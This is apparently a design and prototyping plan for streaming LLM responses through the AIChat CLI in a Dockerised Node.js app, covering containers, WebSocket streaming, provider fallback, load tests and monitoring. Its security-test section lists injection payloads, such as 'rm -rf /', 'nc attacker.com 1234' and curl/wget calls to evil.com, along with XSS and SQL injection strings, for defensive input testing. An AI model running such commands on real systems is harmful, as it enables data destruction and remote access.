Last updated: Sep 1, 2025, 01:10 PM UTC

LLM CLI Integration Prototyping Plan

Generated: 2025-08-05 UTC
Purpose: Systematic approach to prototype and validate LLM CLI integration for Sasha Studio
Target: Docker-based Node.js application with real-time AI chat streaming


Prototype Objectives

  1. Validate streaming performance - Token-by-token response rendering
  2. Test multi-provider routing - Fallback mechanisms and cost optimization
  3. Verify Docker integration - Container setup and security patterns
  4. Measure error handling - Connection resilience and recovery
  5. Assess scalability - Concurrent request handling

Prototype Architecture

Phase 1: Core Integration Test (Week 1)

Prototype 1A: Basic CLI Streaming

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”    spawn()    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”    stdout    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Node.js API    │──────────────►│  AIChat CLI  │─────────────►│  WebSocket      β”‚
β”‚  Server         β”‚               β”‚  Process     β”‚              β”‚  Client         β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜              β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Validation Criteria:

  • Token-by-token streaming without blocking
  • Process cleanup on connection close
  • Error handling for CLI failures
  • Memory usage under load

Expected Timeline: 2-3 days
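
Before wiring WebSockets in, the criteria above can be exercised from the terminal. The sketch below is a minimal starting point, not the final integration: it assumes the aichat binary is on the PATH and uses the same -m/--stream/--no-save flags that the later prototypes use, and the file name is illustrative.

// prototype/basic-stream.js (illustrative file name)
const { spawn } = require('child_process');

// Spawn the CLI and hand each stdout chunk to a callback as it arrives.
// Nothing here blocks the event loop; onChunk/onDone/onError are caller-supplied.
function streamPrompt(prompt, { onChunk, onDone, onError }) {
    const child = spawn('aichat', ['-m', 'openai:gpt-4', '--stream', '--no-save', prompt]);

    child.stdout.on('data', (chunk) => onChunk(chunk.toString()));
    child.stderr.on('data', (err) => onError(new Error(err.toString())));
    child.on('close', (code) => onDone(code));

    // Return the child so the caller can kill it on disconnect (process cleanup criterion).
    return child;
}

// Example run from the terminal: node prototype/basic-stream.js
const child = streamPrompt('Explain streaming in one sentence', {
    onChunk: (text) => process.stdout.write(text),
    onDone: (code) => console.log(`\n[exit ${code}]`),
    onError: (err) => console.error(err.message)
});

// Simulate a client disconnect after 30 seconds to verify cleanup behavior.
setTimeout(() => { if (child.exitCode === null) child.kill('SIGTERM'); }, 30000).unref();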

Prototype 1B: Multi-Provider Testing

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”              β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Provider Router│──┐           β”‚  OpenAI API  β”‚
β”‚  Logic          β”‚  β”‚           β”‚  (via CLI)   β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜  β”‚           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                     β”‚
                     β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                     β”‚           β”‚  Claude API  β”‚
                     β”‚           β”‚  (via CLI)   β”‚
                     β”‚           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                     β”‚
                     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                                 β”‚  Gemini API  β”‚
                                 β”‚  (via CLI)   β”‚
                                 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Validation Criteria:

  • Automatic fallback when provider fails
  • Cost calculation accuracy (see the cost sketch below)
  • Provider-specific error handling
  • Configuration management

Expected Timeline: 2-3 days
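
Cost calculation has no code elsewhere in this plan, so a rough sketch is worth carrying into Prototype 1B. The per-1K-token prices below are placeholders rather than real rates, and token counts are estimated from character counts because the CLI's stdout does not include usage data in these prototypes.

// prototype/cost-estimator.js (sketch; prices are placeholders, not real provider rates)
const PRICING_PER_1K_TOKENS = {
    'openai:gpt-4':           { input: 0.03,   output: 0.06 },
    'openai:gpt-3.5-turbo':   { input: 0.0005, output: 0.0015 },
    'claude:claude-3-sonnet': { input: 0.003,  output: 0.015 },
    'gemini:gemini-pro':      { input: 0.0005, output: 0.0015 }
};

// Very rough heuristic: roughly 4 characters per token for English text.
const estimateTokens = (text) => Math.ceil(text.length / 4);

function estimateCost(model, promptText, responseText) {
    const pricing = PRICING_PER_1K_TOKENS[model];
    if (!pricing) return null; // unknown model: report "cost unknown" rather than guessing

    const inputTokens = estimateTokens(promptText);
    const outputTokens = estimateTokens(responseText);
    return {
        inputTokens,
        outputTokens,
        usd: (inputTokens / 1000) * pricing.input + (outputTokens / 1000) * pricing.output
    };
}

module.exports = { estimateCost };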


Docker Integration Strategy

Phase 2: Container Architecture (Week 1-2)

Dockerfile Prototype

FROM node:20-alpine AS base

# Install AIChat CLI (most comprehensive alternative to LLxprt); pin the release tag so the URL matches the versioned asset name
RUN wget https://github.com/sigoden/aichat/releases/download/v0.30.0/aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
    && tar -xzf aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
    && mv aichat /usr/local/bin/ \
    && chmod +x /usr/local/bin/aichat \
    && rm aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz

# Create non-root user for security
RUN addgroup -g 1001 -S nodejs && \
    adduser -S nodejs -u 1001

# Setup configuration directory
RUN mkdir -p /app/.config/aichat && \
    chown -R nodejs:nodejs /app

FROM base AS development
WORKDIR /app
USER nodejs

# Copy package files
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci  # the development image needs runtime and dev dependencies, so install everything

# Copy source code
COPY --chown=nodejs:nodejs . .

EXPOSE 3000
CMD ["npm", "run", "dev"]

FROM base AS production
WORKDIR /app
USER nodejs

# Copy package files and install production dependencies
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci --omit=dev

# Copy source code
COPY --chown=nodejs:nodejs . .

EXPOSE 3000
CMD ["node", "server.js"]

Configuration Management

# .config/aichat/config.yaml
model: openai:gpt-4
temperature: 0.7
stream: true
save: false  # Don't save conversations to avoid disk bloat

clients:
  - type: openai
    api_key: ${OPENAI_API_KEY}
    api_base: https://api.openai.com/v1
  - type: claude
    api_key: ${ANTHROPIC_API_KEY}  
    api_base: https://api.anthropic.com
  - type: gemini
    api_key: ${GOOGLE_API_KEY}
    api_base: https://generativelanguage.googleapis.com

Validation Criteria:

  • Secure API key management via environment variables
  • Non-root container execution
  • Proper file permissions and ownership
  • Resource limits and health checks
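
One way to exercise the last two criteria is a compose file. The sketch below is assumption-heavy: the /health endpoint is not defined anywhere in this plan (a matching route appears in the server wiring sketch later on), and the CPU/memory limits are placeholders to be tuned during load testing.

# docker-compose.yml (sketch; /health endpoint and limit values are assumptions)
services:
  sasha-studio:
    build:
      context: .
      target: production
    ports:
      - "3000:3000"
    environment:
      - OPENAI_API_KEY=${OPENAI_API_KEY}
      - ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY}
      - GOOGLE_API_KEY=${GOOGLE_API_KEY}
    deploy:
      resources:
        limits:
          cpus: "1.0"
          memory: 512M
    healthcheck:
      test: ["CMD", "wget", "-qO-", "http://localhost:3000/health"]
      interval: 30s
      timeout: 5s
      retries: 3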

Streaming Implementation Patterns

Phase 3: Real-Time Communication (Week 2)

WebSocket + CLI Integration

// prototype/streaming-integration.js
const { spawn } = require('child_process');
const WebSocket = require('ws');
const express = require('express');

class StreamingLLMService {
    constructor() {
        this.activeStreams = new Map();
    }

    async startStream(sessionId, message, model = 'openai:gpt-4') {
        const startTime = Date.now();

        // Spawn the CLI process with streaming. The child must not be named
        // `process`: that would shadow the Node.js global and make `...process.env`
        // below reference the uninitialized local binding.
        const child = spawn('aichat', [
            '-m', model,
            '--stream',
            '--no-save',
            message
        ], {
            env: {
                ...process.env,
                AICHAT_CONFIG_DIR: '/app/.config/aichat'
            }
        });

        this.activeStreams.set(sessionId, {
            process: child,
            startTime,
            chunks: 0,
            totalChars: 0
        });

        return child;
    }

    setupWebSocketHandling(wss) {
        wss.on('connection', (ws, req) => {
            const sessionId = req.url.split('session=')[1];
            
            ws.on('message', async (data) => {
                try {
                    const { message, model } = JSON.parse(data);
                    const child = await this.startStream(sessionId, message, model);
                    
                    // Stream stdout to WebSocket
                    child.stdout.on('data', (chunk) => {
                        const streamData = this.activeStreams.get(sessionId);
                        if (streamData) {
                            streamData.chunks++;
                            streamData.totalChars += chunk.length;
                        }
                        
                        ws.send(JSON.stringify({
                            type: 'chunk',
                            content: chunk.toString(),
                            sessionId
                        }));
                    });

                    // Handle completion
                    child.on('close', (code) => {
                        const streamData = this.activeStreams.get(sessionId);
                        const duration = streamData ? Date.now() - streamData.startTime : 0;
                        
                        ws.send(JSON.stringify({
                            type: 'complete',
                            sessionId,
                            metadata: {
                                duration,
                                chunks: streamData?.chunks || 0,
                                totalChars: streamData?.totalChars || 0,
                                exitCode: code
                            }
                        }));
                        
                        this.activeStreams.delete(sessionId);
                    });

                    // Error handling
                    child.stderr.on('data', (error) => {
                        ws.send(JSON.stringify({
                            type: 'error',
                            error: error.toString(),
                            sessionId
                        }));
                    });

                } catch (error) {
                    ws.send(JSON.stringify({
                        type: 'error',
                        error: error.message,
                        sessionId
                    }));
                }
            });

            ws.on('close', () => {
                // Cleanup any active processes for this session
                const streamData = this.activeStreams.get(sessionId);
                if (streamData?.process) {
                    streamData.process.kill('SIGTERM');
                    this.activeStreams.delete(sessionId);
                }
            });
        });
    }
}
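
A sketch of how the service above could be mounted on an HTTP server, assuming the class is exported from streaming-integration.js (the listing above does not export it) and that the ws package provides the WebSocket server.

// prototype/server.js (sketch; assumes streaming-integration.js ends with `module.exports = StreamingLLMService;`)
const http = require('http');
const express = require('express');
const WebSocket = require('ws');
const StreamingLLMService = require('./streaming-integration');

const app = express();
app.get('/health', (req, res) => res.json({ status: 'ok' })); // liveness probe used by the container healthcheck (assumption)

const server = http.createServer(app);
const wss = new WebSocket.Server({ server });

new StreamingLLMService().setupWebSocketHandling(wss);

server.listen(3000, () => console.log('Prototype server listening on :3000'));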

Provider Fallback Logic

// prototype/provider-router.js
const { spawn } = require('child_process');

class ProviderRouter {
    constructor() {
        this.providers = {
            'openai': { models: ['gpt-4', 'gpt-3.5-turbo'], priority: 1 },
            'claude': { models: ['claude-3-sonnet', 'claude-3-haiku'], priority: 2 },
            'gemini': { models: ['gemini-pro'], priority: 3 }
        };
        
        this.healthStatus = new Map();
        this.lastHealthCheck = new Map();
    }

    async routeRequest(message, preferredProvider = null) {
        const availableProviders = await this.getHealthyProviders();
        
        if (preferredProvider && availableProviders.includes(preferredProvider)) {
            return this.executeWithProvider(preferredProvider, message);
        }

        // Try providers in priority order
        for (const provider of availableProviders) {
            try {
                return await this.executeWithProvider(provider, message);
            } catch (error) {
                console.warn(`Provider ${provider} failed, trying next:`, error.message);
                this.markProviderUnhealthy(provider);
                continue;
            }
        }

        throw new Error('All providers failed');
    }

    async executeWithProvider(provider, message) {
        const model = `${provider}:${this.providers[provider].models[0]}`;
        
        return new Promise((resolve, reject) => {
            // Named `child` so the Node.js global `process` is not shadowed
            const child = spawn('aichat', ['-m', model, '--stream', message]);
            let response = '';

            child.stdout.on('data', (chunk) => {
                response += chunk.toString();
            });

            child.on('close', (code) => {
                if (code === 0) {
                    this.markProviderHealthy(provider);
                    resolve({ provider, model, response });
                } else {
                    reject(new Error(`Provider ${provider} exited with code ${code}`));
                }
            });

            child.stderr.on('data', (error) => {
                reject(new Error(`Provider ${provider} error: ${error.toString()}`));
            });
        });
    }

    async getHealthyProviders() {
        const healthy = [];
        
        for (const [provider, config] of Object.entries(this.providers)) {
            if (await this.isProviderHealthy(provider)) {
                healthy.push(provider);
            }
        }
        
        return healthy.sort((a, b) => 
            this.providers[a].priority - this.providers[b].priority
        );
    }

    async isProviderHealthy(provider) {
        const lastCheck = this.lastHealthCheck.get(provider) || 0;
        const now = Date.now();
        
        // Cache health status for 5 minutes
        if (now - lastCheck < 5 * 60 * 1000) {
            return this.healthStatus.get(provider) !== false;
        }
        
        try {
            // Quick health check with minimal request
            await this.executeWithProvider(provider, 'test');
            this.healthStatus.set(provider, true);
            this.lastHealthCheck.set(provider, now);
            return true;
        } catch (error) {
            this.healthStatus.set(provider, false);
            this.lastHealthCheck.set(provider, now);
            return false;
        }
    }

    markProviderHealthy(provider) {
        this.healthStatus.set(provider, true);
        this.lastHealthCheck.set(provider, Date.now());
    }

    markProviderUnhealthy(provider) {
        this.healthStatus.set(provider, false);
        this.lastHealthCheck.set(provider, Date.now());
    }
}
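
Example usage, as a sketch: ask for a preferred provider and let the router fall back through the priority order when that provider is unhealthy or fails mid-request.

// Example usage of ProviderRouter (sketch)
const router = new ProviderRouter();

(async () => {
    try {
        // Preferred provider is honored when healthy; otherwise priority order applies.
        const result = await router.routeRequest('Summarize this release note', 'claude');
        console.log(`Answered by ${result.provider} (${result.model}):`);
        console.log(result.response);
    } catch (error) {
        console.error('All providers failed:', error.message); // surfaced to the caller/UI
    }
})();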

Validation Criteria:

  • Sub-second first token response time
  • Smooth streaming without UI blocking
  • Graceful WebSocket reconnection (see the client sketch after this list)
  • Automatic provider failover
  • Memory usage remains stable under load
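
The reconnection criterion is client-side and is not covered by the server code above. A minimal sketch using the ws package, assuming the streaming prototype server is running on localhost:3000; the backoff values are arbitrary.

// prototype/reconnecting-client.js (sketch; backoff values are arbitrary)
const WebSocket = require('ws');

function connect(sessionId, attempt = 0) {
    const ws = new WebSocket(`ws://localhost:3000/ws?session=${sessionId}`);

    ws.on('open', () => {
        attempt = 0; // reset backoff once connected again
        console.log('connected');
    });

    ws.on('message', (data) => {
        const msg = JSON.parse(data);
        if (msg.type === 'chunk') process.stdout.write(msg.content);
    });

    ws.on('close', () => {
        // Exponential backoff capped at 10s: 0.5s, 1s, 2s, 4s, 8s, 10s, ...
        const delay = Math.min(500 * 2 ** attempt, 10000);
        console.log(`connection lost, retrying in ${delay}ms`);
        setTimeout(() => connect(sessionId, attempt + 1), delay);
    });

    ws.on('error', () => { /* 'close' fires afterwards and drives the retry */ });

    return ws;
}

connect('reconnect-test');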

Performance Testing Strategy

Phase 4: Load Testing (Week 2-3)

Concurrent Stream Testing

// prototype/load-test.js
const WebSocket = require('ws');

async function loadTest() {
    const concurrentConnections = 10;
    const messagesPerConnection = 5;
    const connections = [];
    
    console.log('Starting load test...');
    console.log(`Concurrent connections: ${concurrentConnections}`);
    console.log(`Messages per connection: ${messagesPerConnection}`);
    
    for (let i = 0; i < concurrentConnections; i++) {
        const ws = new WebSocket(`ws://localhost:3000/ws?session=test-${i}`);
        connections.push({
            ws,
            sessionId: `test-${i}`,
            messagesSent: 0,
            responses: [],
            startTime: Date.now()
        });
        
        ws.on('open', () => {
            console.log(`Connection ${i} opened`);
            sendNextMessage(connections[i]);
        });
        
        ws.on('message', (data) => {
            const message = JSON.parse(data);
            const conn = connections[i];
            
            if (message.type === 'complete') {
                conn.responses.push({
                    duration: Date.now() - conn.startTime,
                    chunks: message.metadata.chunks
                });
                
                if (conn.messagesSent < messagesPerConnection) {
                    setTimeout(() => sendNextMessage(conn), 1000);
                } else {
                    ws.close();
                }
            }
        });
    }
    
    function sendNextMessage(conn) {
        conn.messagesSent++;
        conn.startTime = Date.now();
        
        conn.ws.send(JSON.stringify({
            message: `Test message ${conn.messagesSent} for load testing`,
            model: 'openai:gpt-3.5-turbo'
        }));
    }
}

loadTest().catch(console.error);
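
The load test above only times full completions, while the first-token target in the next subsection needs time-to-first-chunk. A small helper like the one below is not part of the load test as written; recordFirstChunk would be called from the first 'chunk' message of each request.

// prototype/latency-stats.js (sketch; wire recordFirstChunk() into the 'chunk' branch of the load test)
const firstTokenLatencies = [];

// Call once per request, when the first 'chunk' message for that request arrives.
function recordFirstChunk(requestStartTime) {
    firstTokenLatencies.push(Date.now() - requestStartTime);
}

function percentile(values, p) {
    if (values.length === 0) return 0;
    const sorted = [...values].sort((a, b) => a - b);
    const index = Math.min(sorted.length - 1, Math.ceil((p / 100) * sorted.length) - 1);
    return sorted[index];
}

function report() {
    console.log(`first-token p50: ${percentile(firstTokenLatencies, 50)}ms`);
    console.log(`first-token p95: ${percentile(firstTokenLatencies, 95)}ms`);
}

module.exports = { recordFirstChunk, report };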

Memory and Resource Monitoring

// prototype/monitor.js
class SystemMonitor {
    constructor() {
        this.metrics = {
            memoryUsage: [],
            activeProcesses: 0,
            responseTimeHistory: [],
            errorRate: 0
        };
        
        this.startMonitoring();
    }
    
    startMonitoring() {
        setInterval(() => {
            const usage = process.memoryUsage();
            this.metrics.memoryUsage.push({
                timestamp: Date.now(),
                heapUsed: usage.heapUsed / 1024 / 1024, // MB
                heapTotal: usage.heapTotal / 1024 / 1024, // MB
                external: usage.external / 1024 / 1024 // MB
            });
            
            // Keep only last 100 measurements
            if (this.metrics.memoryUsage.length > 100) {
                this.metrics.memoryUsage.shift();
            }
        }, 5000);
    }
    
    recordResponseTime(duration) {
        this.metrics.responseTimeHistory.push(duration);
        if (this.metrics.responseTimeHistory.length > 1000) {
            this.metrics.responseTimeHistory.shift();
        }
    }
    
    getAverageResponseTime() {
        if (this.metrics.responseTimeHistory.length === 0) return 0;
        
        const sum = this.metrics.responseTimeHistory.reduce((a, b) => a + b, 0);
        return sum / this.metrics.responseTimeHistory.length;
    }
    
    getMemoryTrend() {
        if (this.metrics.memoryUsage.length < 2) return 'stable';
        
        const recent = this.metrics.memoryUsage.slice(-10);
        const trend = recent[recent.length - 1].heapUsed - recent[0].heapUsed;
        
        if (trend > 10) return 'increasing';
        if (trend < -10) return 'decreasing';
        return 'stable';
    }
}
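
A usage sketch for the monitor: instantiate it once and expose its numbers on a debug endpoint. The /metrics route, the port, and the module export are assumptions for the prototype.

// prototype/metrics-endpoint.js (sketch; assumes monitor.js ends with `module.exports = SystemMonitor;`)
const express = require('express');
const SystemMonitor = require('./monitor');

const monitor = new SystemMonitor();
const app = express();

// StreamingLLMService's 'complete' handler would call monitor.recordResponseTime(duration).
app.get('/metrics', (req, res) => {
    res.json({
        averageResponseTimeMs: monitor.getAverageResponseTime(),
        memoryTrend: monitor.getMemoryTrend(),
        memorySamples: monitor.metrics.memoryUsage.length
    });
});

app.listen(3001, () => console.log('Metrics endpoint on :3001'));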

Performance Targets:

  • First Token: < 500ms
  • Memory Growth: < 5MB/hour under normal load
  • Concurrent Streams: 10+ simultaneous users
  • Error Rate: < 1% under normal conditions
  • CPU Usage: < 50% during streaming

Security Validation

Phase 5: Security Testing (Week 3)

Input Sanitization Testing

// prototype/security-tests.js
const WebSocket = require('ws');

const securityTests = [
    // Command injection attempts
    'test; rm -rf /',
    'test && curl evil.com',
    'test | nc attacker.com 1234',
    'test $(wget evil.com)',
    
    // XSS attempts  
    '<script>alert("xss")</script>',
    'javascript:alert(1)',
    
    // Path traversal
    '../../../etc/passwd',
    '..\\..\\windows\\system32',
    
    // SQL injection patterns
    "'; DROP TABLE users; --",
    '1 OR 1=1',
    
    // Extremely long inputs
    'A'.repeat(100000),
    
    // Special characters
    String.fromCharCode(0, 1, 2, 3, 4, 5)
];

async function runSecurityTests() {
    for (const testInput of securityTests) {
        try {
            console.log(`Testing: ${testInput.substring(0, 50)}...`);
            
            const ws = new WebSocket('ws://localhost:3000/ws?session=security-test');
            
            ws.on('open', () => {
                ws.send(JSON.stringify({
                    message: testInput,
                    model: 'openai:gpt-3.5-turbo'
                }));
            });
            
            ws.on('message', (data) => {
                const response = JSON.parse(data);
                if (response.type === 'error') {
                    console.log('βœ… Properly rejected malicious input');
                } else {
                    console.log('⚠️  Input was processed - review for security issues');
                }
                ws.close();
            });
            
        } catch (error) {
            console.log('βœ… Input properly rejected:', error.message);
        }
        
        await new Promise(resolve => setTimeout(resolve, 100));
    }
}

runSecurityTests().catch(console.error);

Security Validation Criteria:

  • Command injection prevention
  • Input length limits enforced
  • Special character handling
  • Process isolation maintained
  • API key exposure prevention
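
Two notes on these criteria. Because the prototypes pass the user message to spawn() as a single argument with no shell, the command-injection payloads in the test list are never interpreted by a shell; they reach the CLI as literal text. Input length limits and control-character handling still need an explicit guard before the CLI is invoked. A sketch, with limits chosen arbitrarily for the prototype:

// prototype/input-guard.js (sketch; the limits are arbitrary prototype values)
const MAX_MESSAGE_LENGTH = 8000;

function validateMessage(raw) {
    if (typeof raw !== 'string' || raw.trim().length === 0) {
        return { ok: false, reason: 'empty or non-string message' };
    }
    if (raw.length > MAX_MESSAGE_LENGTH) {
        return { ok: false, reason: `message exceeds ${MAX_MESSAGE_LENGTH} characters` };
    }
    // Reject ASCII control characters (except newline and tab) before spawning the CLI.
    if (/[\u0000-\u0008\u000B\u000C\u000E-\u001F]/.test(raw)) {
        return { ok: false, reason: 'control characters are not allowed' };
    }
    return { ok: true };
}

module.exports = { validateMessage };

// In the WebSocket 'message' handler, before startStream():
//   const check = validateMessage(message);
//   if (!check.ok) return ws.send(JSON.stringify({ type: 'error', error: check.reason, sessionId }));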

Success Metrics & KPIs

Technical Performance

  • Streaming Latency: First token < 500ms, subsequent tokens < 50ms
  • Memory Efficiency: < 100MB base usage, < 5MB growth per hour
  • Error Recovery: < 5 second reconnection time
  • Process Management: Zero zombie processes after 24h operation

Provider Integration

  • Fallback Success Rate: > 99% successful fallback when primary fails
  • Cost Accuracy: Β±5% accuracy in cost calculations
  • Provider Coverage: Support for 3+ major providers (OpenAI, Anthropic, Google)

Security & Reliability

  • Input Validation: 100% malicious input rejection
  • Container Security: Non-root execution, minimal privileges
  • Audit Logging: Complete request/response logging for compliance
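
The audit-logging KPI has no corresponding code in the earlier prototypes. A minimal sketch, assuming newline-delimited JSON on local disk is acceptable for the prototype; whether full prompt/response bodies are captured is a separate compliance decision, and API keys must never be written.

// prototype/audit-log.js (sketch; local NDJSON files assumed acceptable for the prototype)
const fs = require('fs');
const path = require('path');

const AUDIT_FILE = path.join('/app', 'logs', 'audit.ndjson');
fs.mkdirSync(path.dirname(AUDIT_FILE), { recursive: true });

// One JSON line per completed request; log request metadata only, never credentials.
function auditRequest({ sessionId, provider, model, durationMs, exitCode, totalChars }) {
    const entry = {
        timestamp: new Date().toISOString(),
        sessionId,
        provider,
        model,
        durationMs,
        exitCode,
        totalChars
    };
    fs.appendFile(AUDIT_FILE, JSON.stringify(entry) + '\n', (err) => {
        if (err) console.error('audit log write failed:', err.message);
    });
}

module.exports = { auditRequest };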

Decision Framework

Prototype Success Criteria

PROCEED with full implementation if:

  • All streaming tests pass performance targets
  • Provider fallback works reliably
  • Security validation shows no vulnerabilities
  • Memory usage remains stable under load
  • Docker integration is seamless

PIVOT to alternative approach if:

  • Streaming latency > 1 second consistently
  • Memory leaks detected in 24h testing
  • Command injection or security issues found
  • Provider fallback fails > 5% of time
  • Docker setup is complex or unreliable

ITERATE prototypes if:

  • Performance is close but needs optimization
  • One provider consistently fails
  • Minor security issues that can be fixed
  • Docker setup needs refinement

Implementation Timeline

Week 1: Core Prototyping

  • Days 1-2: Basic CLI streaming integration
  • Days 3-4: Multi-provider testing and fallback
  • Days 5-7: Docker container integration and testing

Week 2: Advanced Features

  • Days 1-3: WebSocket real-time streaming
  • Days 4-5: Load testing and performance optimization
  • Days 6-7: Security testing and validation

Week 3: Documentation & Decision

  • Days 1-2: Create comprehensive integration guide
  • Days 3-4: Document all patterns and lessons learned
  • Days 5-7: Final recommendation and next steps

Feedback Loop

After each prototype phase:

  1. Measure against success criteria
  2. Document lessons learned
  3. Identify optimization opportunities
  4. Update implementation approach
  5. Create reusable patterns

This systematic approach ensures we build robust, scalable LLM integration with confidence in our technical decisions.


This prototyping plan provides a comprehensive path from concept to production-ready implementation, with clear validation criteria and decision points along the way.